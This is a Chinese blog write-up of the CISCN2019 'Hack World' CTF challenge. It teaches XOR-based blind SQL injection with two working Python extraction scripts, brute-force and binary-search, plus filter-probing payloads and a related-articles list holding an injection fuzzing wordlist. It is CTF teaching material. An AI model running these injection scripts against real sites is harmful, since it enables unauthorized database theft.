Web-异或注入-[CISCN2019 华北赛区 Day2 Web1]Hack World

最新推荐文章于 2024-04-27 22:40:28 发布
最新推荐文章于 2024-04-27 22:40:28 发布
阅读量323 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 二分法 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51927659/article/details/115790127
版权

Web-异或注入-[CISCN2019 华北赛区 Day2 Web1]Hack World

一、知识点

1、异或注入

爆破法payload构造:

payload = {"id":'0^' + '(ascii(substr((select(flag)from(flag)),' + str(i) + ',1))=' + str(j)+')'}

二分法payload构造:

 0^(ascii(substr((select(flag)from(flag)),1,1))>1)

用途:可用于判断过滤

http://120.24.86.145:9004/1ndex.php?id=1’^(length(‘union’)=5)%23
当union被过滤时1^0 输出id=1 当union没被过滤时 1 ^ 1 输出 id=0 回显 erro

2、python中substr()函数的用法
在这里插入图片描述
3、脚本测试
爆破法脚本

url='http://b43adb54-b05b-4c19-bac8-e0c52f7c2664.node3.buuoj.cn/'#url不同需修改.
flag=''
for  i in range(1,50):
    print(i)
    for j in range(32,127):
        time.sleep(0.05)
        payload = {"id":'0^' + '(ascii(substr((select(flag)from(flag)),' + str(i) + ',1))=' + str(j)+')'}
        result=requests.post(url,data=payload)
        if 'Hello' in result.text:
            flag+=chr(j)
            break
print(flag)

import  requests
import  time
url=""

二分法脚本:

import requests
import time

url="http://b43adb54-b05b-4c19-bac8-e0c52f7c2664.node3.buuoj.cn/"
flag=''
for i in range(43):
    max=127
    min=32
    while True:
        s=(int)((min+max)/2)
        payload={'id':   '0^'+'(ascii(substr((select(flag)from(flag)),'+str(i)+',1))>'+str(s)+')'}
        result=requests.post(url, data=payload)
        time.sleep(0.005)
        if 'Hello' in result.text:
            min=s
        else:
            max=s
        if (max-min)<=1:
            flag+=chr(max)
            break
    print(flag)
print(flag)

4、特注注意
这道题目不能过快提交,所以可以用time模块来适当延时.

time.sleep(0.005)

二、解题步骤

1、提交0,回显异常,1回显正常
在这里插入图片描述
在这里插入图片描述

2、提交1‘#显示#被ban
在这里插入图片描述
3、尝试构造异或注入的payload

payload={'id':'0^'+'(ascii(substr(select(flag)from(flag),'+str(i)+',1))>'+str(s)+')'}

4、python脚本
在这里插入图片描述

5、脚本攻击
在这里插入图片描述
6、cat flag

lunan0320
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[CISCN2019 华北赛区 Day2 Web1]Hack World
qi_SJQ_的博客
10-29 246
拿到一道sql注入题思路: 测试过滤:可以bp加字典fuzzing一下,看过滤哪些字符: 找的大佬的fuzzing字典: ` ~ ! @ # $ % ^ & * ( ) - _ = + [ ] { } | \ ; : ' " , . < > / ? -- --+ /**/ && || <> !(<>) and or xor if not select sleep union from where order by concat group b
bp-异或
02-17
bp-异或
异或注入
xuchen16的博客
10-06 1989
转载自:https://www.jianshu.com/p/27df5c67157c 原理 异或是一种逻辑运算,运算法则简言之就是:两个条件相同(同真或同假)即为假(0),两个条件不同即为真(1),null与任何条件做异或运算都为null,如果从数学的角度理解就是,空集与任何集合的交集都为空。 mysql里异或运算符为^ 或者 xor 两个同为真的条件做异或,结果为假 两个同为假的条件...
[CISCN2019 华北赛区 Day2 Web1]Hack World -wp
freerats的博客
06-27 246
可以在页面上看到提示,flag在flag表flag列里 在查询0,1,2时会获得不同的回显, 0回显:Error Occured When Fetch Result. 1:Hello, glzjin wants a girlfriend 2:Do you want to be my girlfriend? 初步判断0字段应该不存在,1,2存在 尝试输入or时发现被ban,我们可以fuzz一下 长为482的都是不允许的 可以发现select,from,where这些常用注入字符都可以使用 题目过滤了双引号,导
SQL注入异或注入
最新发布
2301_80395418的博客
04-27 531
异或注入
buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World-wp
居上
08-10 305
[CISCN2019 华北赛区 Day2 Web1]Hack World 知识点 fuzz python盲注脚本 过程 fuzz一哈 一个搜索框,搜索框输入1或2会返回结果,其他都返回bool(false)。过滤了union、and、or、空格等 贴上脚本: import requests url = "http://a5a19ec2-3fe1-4f07-9465-f4c861d25093.node4.buuoj.cn:81/index.php" result = "" num = 0 # 用
(完整word版)单片机avr-c语言位运算-与或非-异或逻辑-运算介绍-详解.doc
11-15
(完整word版)单片机avr-c语言位运算-与或非-异或逻辑-运算介绍-详解.doc
01.入门笔记之看雪Web安全学习及异或解密示例1
08-03
1.网安术语 2.常用工具 3.推荐文章 3.越权漏洞 4.CSRF跨站请求伪造 5.支付漏洞 1.网安术语 2.常用工具
14-位运算符(与-或-异或).avi
11-02
价值上万的Java精品网课教程\第02天(进制,位运算,语句)
C#412-异或加密数字源代码
01-05
C#412-异或加密数字,源程序,try { if (textBox2.Text != "") { textBox1.Text = (Convert.ToInt32(textBox2.Text) ^ 123).ToString(); } } catch { }
异或盲注注入
lgsyydsa的博客
09-20 287
异或注入是通过sql语句中进行异或逻辑的注入方式。因为异或逻辑通常返回的是1和0,所以一般用于盲注中。因为'admin'^1结果为1,查询语句就变为username=1,而表里的username再与1比较,username会先变成数字再与1对比。因为‘admin’^0是0,username转为数字都是0,所以整个表都会出来。字符与字符:字符中如果没有数字或者数字在字母后面在比较时都会转为数字0。同理将‘admin’改为0时,也会是这种结果。数字与字符:将字符转为数字进行异或操作。用的是二分法,不是枚举。
sql注入漏洞之异或注入
SoporAeternus12的博客
04-06 7366
在介绍异或注入之前,先看看这个 mysql> select 'aaa'=0; +---------+ | 'aaa'=0 | +---------+ | 1 | +---------+ 1 row in set, 1 warning (0.00 sec) #这里可以看到返回结果是1,表示true mysql> select 'aaa'=1; +---------+ | 'aaa'=1 | +---------+ | 0 | +---------+ 1 row in se
sql注入中的异或注入--sql注入加强版(盲注)[极客大挑战 2019]FinalSQL
qq_59020256的博客
12-25 1148
异或注入是盲注的一种类型,因为异或逻辑通常返回的是1和0,所以一般用于盲注中。这里'roo'=0所以说uname=0^1,所以说uname=1。这里'roo'=0所以说uname=0^0,所以说uname=0。这点我首先在用户名、密码输入了一系列的注入点发现都没有什么效果,这就是这个傻鸟靶场坑的地方。这里length(database())>0如果为真就为1,id=1^1,也就为id=0。id='1'^1这里也就等同于id=1^1,也就为id=0。当我点击1的时候,奇异的一幕发生了,我点击进去了。
sql异同或注入总结
Aiwin的博客
10-12 1894
sql异同或注入总结与[NSSCTF 2022 Spring Recruit]babysql与[CISCN 2019华北Day2]Web1例题
SQL注入
qq_40837276的博客
09-16 560
目录sqlmap的使用1.数字型注入2.时间盲注3.异或注入(判断过滤字符)4.布尔盲注5.报错注入6.宽字节注入 猜测: # --+ ’ " 常见绕过: Base64加密 双写 大小写 sqlmap的使用 缓存,随便找一条sqlmap的语句,后面加–flush,然后重新跑 burp抓包,保存到1.txt文件中 sqlmap -r 1.txt --tables 猜表名 sqlmap -r ...
[极客大挑战 2019]FinalSQL(异或盲注)
EC_Carrot的博客
12-21 552
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 测试一下登录,发现是个幌子,因为给过滤掉的东西太多了,但是点击上面的1~5按钮,发现url出现id字样 再FUZZ测试一下发现盲注可行 异或'^'是一种数学运算,1^1=0 0^0=0 1^0=0,可以用来进行sql注入,当两条件相同时(同真同假)结果为假,当两条件不同时(一真一假)结果为真 1^1有ERROR字样,1^0则为这个界面,所以脚本
[护网杯 2018]easy_tornado WriteUp(超级详细!)
lunan的博客
04-22 3182
[护网杯 2018]easy_tornado   打开题目后,首先发现3个超链接   依次点开三个链接    网址里有参数filename和filehash推测这里flag应该是 filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(filename))里面,filehash里hash就是提示为md5的hash加密。    变量 filename 的值总是为要访问的文件,再根据提示三和 fil
[HCTF 2018]WarmUp WriteUp(超级详细)
lunan的博客
04-22 3162
HCTF 2018:WarmUp 题目来源:BUUCTF 首先打开题目,url查找index.php时发现了一张滑稽的图片,此时查看源码发现source.php文件,直接访问得到界面源码。     显然需要我们进行代码审计,分析源码。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) //传
1-0x15循环异或
12-25
对于题目中的1-0x15循环异或,表示对从1到0x15(十进制为21)的所有数进行循环异或运算。 以下是一个演示循环异或的例子: ```python start = 1 end = 0x15 result = 0 for i in range(start, end+1): result ^=...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值